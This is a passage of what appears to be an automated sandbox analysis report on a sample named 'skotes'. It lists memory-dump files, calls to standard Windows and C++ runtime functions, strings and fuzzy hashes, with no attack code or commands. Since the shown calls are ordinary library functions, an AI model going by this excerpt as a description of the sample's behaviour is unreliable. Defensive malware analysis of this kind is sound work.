                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Mtx_unlock
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 1418687624-768041998
                                                                                                                • Opcode ID: a6e986b586ca2ee40827f6c4757d31d6aeb22490aa95b257d02e6c5bfe398e71
                                                                                                                • Instruction ID: 14415005da7d01abc1559dba36eb1f63e94b0e46ff40bea90e80c7140cde6ec9
                                                                                                                • Opcode Fuzzy Hash: a6e986b586ca2ee40827f6c4757d31d6aeb22490aa95b257d02e6c5bfe398e71
                                                                                                                • Instruction Fuzzy Hash: 130122B1908A48EBDF15CF68ED05F52B7ACE709B20F00466AFC1583B91EB3E9810C651
                                                                                                                APIs
                                                                                                                • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 007A0CD7
                                                                                                                • Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 007A0D2A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
                                                                                                                • String ID: p[~
                                                                                                                • API String ID: 3303180142-1161980390
                                                                                                                • Opcode ID: bd6a898ed952844421274940d061c3f160715c2b6348274d4722f441bb07ff6f
                                                                                                                • Instruction ID: 7e9c8e0836939d80eb87110518901ecc4192fde22269b3f0f98351b9e7bd3c5f
                                                                                                                • Opcode Fuzzy Hash: bd6a898ed952844421274940d061c3f160715c2b6348274d4722f441bb07ff6f
                                                                                                                • Instruction Fuzzy Hash: 5D01B571E06608DFCB10ABF8655935D66E0AB8E314F604A6EF405EB282DE7C4E4087A6
                                                                                                                APIs
                                                                                                                • CreateSemaphoreExW.KERNEL32(?,007A65E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0079CAFC
                                                                                                                • CreateSemaphoreW.KERNEL32(?,007A65E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0079CB1E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateSemaphore
                                                                                                                • String ID: ez
                                                                                                                • API String ID: 1078844751-1282118492
                                                                                                                • Opcode ID: 20c49d00089051a89a3ccd51b30c6f02809dc3bdce593b1b89e6faf961e9b478
                                                                                                                • Instruction ID: 784037795e90bdac53aa7830dab3fba8baf441c99aa633487b6bd962bc68810d
                                                                                                                • Opcode Fuzzy Hash: 20c49d00089051a89a3ccd51b30c6f02809dc3bdce593b1b89e6faf961e9b478
                                                                                                                • Instruction Fuzzy Hash: E3F0D476502169ABCF239F90EC059AE7F66FF08B60B048015FD096A130C7369C61EFE4
                                                                                                                APIs
                                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 00782B63
                                                                                                                Strings
                                                                                                                • This function cannot be called on a default constructed task, xrefs: 00782B43
                                                                                                                • =L-t, xrefs: 00782B36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ___std_exception_copy
                                                                                                                • String ID: =L-t$This function cannot be called on a default constructed task
                                                                                                                • API String ID: 2659868963-980932591
                                                                                                                • Opcode ID: 55f5302d677da3b3b2694febb2923dd32a24b5eff10069459c768914c0b80376
                                                                                                                • Instruction ID: 6b8513af159f271b8ef978409489ffec06d244ada14d381e1b5a2080d3f1b61b
                                                                                                                • Opcode Fuzzy Hash: 55f5302d677da3b3b2694febb2923dd32a24b5eff10069459c768914c0b80376
                                                                                                                • Instruction Fuzzy Hash: A9F0A771D1020C9BC710DF68984199EF7F9EF15300F5042AEF84167301EB751A588B95
                                                                                                                APIs
                                                                                                                • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 007AB94E
                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007AB961
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                • String ID: pContext
                                                                                                                • API String ID: 548886458-2046700901
                                                                                                                • Opcode ID: 9d8b7043ff193b1ea94b9217b8ed478c7b3a719fb9a661c68770b4f26c4a86d2
                                                                                                                • Instruction ID: ffe37c9f8ffe717f80e138daff671d17d3be732d5414694a71df697d73674349
                                                                                                                • Opcode Fuzzy Hash: 9d8b7043ff193b1ea94b9217b8ed478c7b3a719fb9a661c68770b4f26c4a86d2
                                                                                                                • Instruction Fuzzy Hash: 17E06879B00208E7CF04F768EC4DD9EBB799EC47107004126E511A3381EB7CAA04CAD0
                                                                                                                APIs
                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A34FC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
